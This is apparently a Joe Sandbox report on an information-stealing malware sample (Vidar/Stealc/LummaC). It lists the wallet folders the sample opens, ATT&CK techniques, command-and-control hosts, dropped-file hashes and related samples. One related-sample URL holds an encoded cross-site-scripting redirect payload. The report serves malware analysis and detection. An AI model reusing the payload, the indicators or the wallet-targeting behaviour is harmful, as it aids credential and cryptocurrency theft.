                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                          Source: Yara match File source: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6880, type: MEMORYSTR

                          Remote Access Functionality

                          Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                          Source: Yara match File source: sslproxydump.pcap, type: PCAP
                          Source: Yara match File source: sslproxydump.pcap, type: PCAP
                          Source: Yara match File source: 0.2.file.exe.4195570.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 3.2.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 3.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.2.file.exe.4195570.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 00000000.00000002.2144562432.0000000004195000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: file.exe PID: 5888, type: MEMORYSTR
                          Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6880, type: MEMORYSTR
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7F0C40 sqlite3_bind_zeroblob,3_2_6C7F0C40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7F0D60 sqlite3_bind_parameter_name,3_2_6C7F0D60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C718EA0 sqlite3_clear_bindings,3_2_6C718EA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7F0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,3_2_6C7F0B40
                          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                          Windows Management Instrumentation
                          1
                          DLL Side-Loading
                          1
                          DLL Side-Loading
                          1
                          Disable or Modify Tools
                          2
                          OS Credential Dumping
                          2
                          System Time Discovery
                          Remote Services1
                          Archive Collected Data
                          12
                          Ingress Tool Transfer
                          Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          Native API
                          Boot or Logon Initialization Scripts511
                          Process Injection
                          11
                          Deobfuscate/Decode Files or Information
                          1
                          Credentials in Registry
                          1
                          Account Discovery
                          Remote Desktop Protocol4
                          Data from Local System
                          21
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts1
                          PowerShell
                          Logon Script (Windows)Logon Script (Windows)4
                          Obfuscated Files or Information
                          Security Account Manager4
                          File and Directory Discovery
                          SMB/Windows Admin Shares1
                          Screen Capture
                          3
                          Non-Application Layer Protocol
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                          Software Packing
                          NTDS55
                          System Information Discovery
                          Distributed Component Object Model2
                          Clipboard Data
                          124
                          Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          DLL Side-Loading
                          LSA Secrets251
                          Security Software Discovery
                          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          Masquerading
                          Cached Domain Credentials31
                          Virtualization/Sandbox Evasion
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                          Virtualization/Sandbox Evasion
                          DCSync12
                          Process Discovery
                          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job511
                          Process Injection
                          Proc Filesystem1
                          Application Window Discovery
                          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                          System Owner/User Discovery
                          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          Behavior Graph (figure not reproduced): ID: 1524788, Sample: file.exe, Startdate: 03/10/2024, Architecture: WINDOWS, Score: 100

                          Source | Detection | Scanner | Label | Link
                          file.exe | 28% | Virustotal | | Browse

                          Source | Detection | Scanner | Label | Link
                          C:\ProgramData\ECBKKKFHCF.exe | 34% | ReversingLabs | Win32.Trojan.Generic |
                          C:\ProgramData\freebl3.dll | 0% | ReversingLabs | |
                          C:\ProgramData\mozglue.dll | 0% | ReversingLabs | |
                          C:\ProgramData\msvcp140.dll | 0% | ReversingLabs | |
                          C:\ProgramData\nss3.dll | 0% | ReversingLabs | |
                          C:\ProgramData\softokn3.dll | 0% | ReversingLabs | |
                          C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs | |
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66fe13d251bbf_lsod[1].exe | 34% | ReversingLabs | Win32.Trojan.Generic |

                          No Antivirus matches
                          Source | Detection | Scanner | Label | Link
                          Source | Detection | Scanner | Label | Link
                          Name | IP | Active | Malicious | Antivirus Detection | Reputation
                          Name | Malicious | Antivirus Detection | Reputation
                          Name | Source | Malicious | Antivirus Detection | Reputation
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                                        104.21.16.12
                                                                                        gravvitywio.storeUnited States
                                                                                        13335CLOUDFLARENETUStrue
                                                                                        45.132.206.251
                                                                                        cowod.hopto.orgRussian Federation
                                                                                        59731LIFELINK-ASRUtrue
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1524788
                                                                                        Start date and time:2024-10-03 09:14:47 +02:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 8m 26s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:14
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:file.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@15/24@12/12
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 99%
                                                                                        • Number of executed functions: 97
                                                                                        • Number of non-executed functions: 114
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:16:14 | API Interceptor | 4x Sleep call for process: RegAsm.exe modified
                                                                                                                                • 188.114.97.3
                                                                                                                                Payment proof.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.21.78.54
                                                                                                                                5STdfnsEu5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.16.12
                                                                                                                                MVR-00876 CARRARO ITALIA SPA.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 188.114.97.3
                                                                                                                                QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 188.114.97.3
                                                                                                                                Payment proof.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.21.78.54
                                                                                                                                4bblnRvDdS.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                • 172.67.222.167
                                                                                                                                HETZNER-ASDEoRdgOQMxjr.exeGet hashmaliciousRedLineBrowse
                                                                                                                                • 178.63.51.126
                                                                                                                                https://www.diamondsbyeden.com/Get hashmaliciousUnknownBrowse
                                                                                                                                • 136.243.216.232
                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 49.12.197.9
                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 49.12.197.9
                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 49.12.197.9
                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 49.12.197.9
                                                                                                                                MZs41xJfcH.exeGet hashmaliciousPureLog Stealer, Quasar, zgRATBrowse
                                                                                                                                • 195.201.57.90
                                                                                                                                N5mRSBWm8P.exeGet hashmaliciousQuasarBrowse
                                                                                                                                • 195.201.57.90
                                                                                                                                https://www.florenceco.org/offices/elected/solicitor/docket.php?area=florence%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%27%2C%27%73%3A%2F%2F%76%27%2C%27%61%75%6C%27%2C%27%74%64%6F%27%2C%27%72%65%73%2E%63%27%2C%27%6F%6D%2F%30%2F%27%2C%27%30%2F%30%2F%27%2C%27%34%33%66%66%27%2C%27%35%63%62%35%27%2C%27%63%36%27%2C%27%32%65%27%2C%27%32%66%38%64%31%27%2C%27%31%63%61%33%38%38%27%2C%27%65%34%37%35%62%36%27%2C%27%63%34%36%2F14/392-16513/1254-3178-27524%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3EGet hashmaliciousPhisherBrowse
                                                                                                                                • 5.161.250.225
                                                                                                                                mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                • 197.242.86.248
Match | Associated Sample Name / URL | Detection | Threat Name
C:\ProgramData\ECBKKKFHCF.exe | file.exe | malicious | LummaC, Stealc, Vidar
C:\ProgramData\freebl3.dll | file.exe | malicious | Stealc, Vidar
 | file.exe | malicious | LummaC, Stealc, Vidar
 | file.exe | malicious | Stealc, Vidar
 | file.exe | malicious | Stealc, Vidar
 | file.exe | malicious | Vidar
 | file.exe | malicious | Vidar
 | file.exe | malicious | Vidar
 | file.exe | malicious | Stealc, Vidar
 | file.exe | malicious | Stealc, Vidar
 | nJohIBtNm5.exe | malicious | LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLine
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):391072
                                                                                                                                                      Entropy (8bit):7.98768128979655
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:A+wIKgwXXUXc+y+VrRlmZwTIwniaYiHQlqy1V0eUspq3lQVGpLqydC2a9EO:AQsXXUs+y+xR8aniXiHQxnFUcrVuLquE
                                                                                                                                                      MD5:BE9E376D9BAB656B145A7C8316636903
                                                                                                                                                      SHA1:D203D8C541918496D75C6C36C43DF8E98CD8AEF8
                                                                                                                                                      SHA-256:43DD8FCF131F4B471D17CBBCF8BD7C0E3C9354D9727E8FE4A8CD763029E4D98C
                                                                                                                                                      SHA-512:3BAFF4F6D869F97B4D6D6E1406074B4EE9E227F40AC3234504D4540DD9B4098A7CD9D12083D92DF4DD88389166779A67CB9D06257B635674AEA21641083E9BBC
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                      Reputation:low
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):40960
                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):155648
                                                                                                                                                      Entropy (8bit):0.5407252242845243
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                      MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):10237
                                                                                                                                                      Entropy (8bit):5.498288591230544
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
                                                                                                                                                      MD5:0F58C61DE9618A1B53735181E43EE166
                                                                                                                                                      SHA1:CC45931CF12AF92935A84C2A015786CC810AEC3A
                                                                                                                                                      SHA-256:AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
                                                                                                                                                      SHA-512:DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):106496
                                                                                                                                                      Entropy (8bit):1.136471148832945
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                      MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                      SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                      SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                      SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):5242880
                                                                                                                                                      Entropy (8bit):0.0357803477377646
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                                                      MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                                                      SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                                                      SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                                                      SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):32768
                                                                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):98304
                                                                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):32768
                                                                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):20480
                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):196608
                                                                                                                                                      Entropy (8bit):1.1239949490932863
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                      MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                      SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                      SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                      SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):51200
                                                                                                                                                      Entropy (8bit):0.8745947603342119
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                      MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                      SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                      SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                      SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):159744
                                                                                                                                                      Entropy (8bit):0.5394293526345721
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                      MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                      SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                      SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
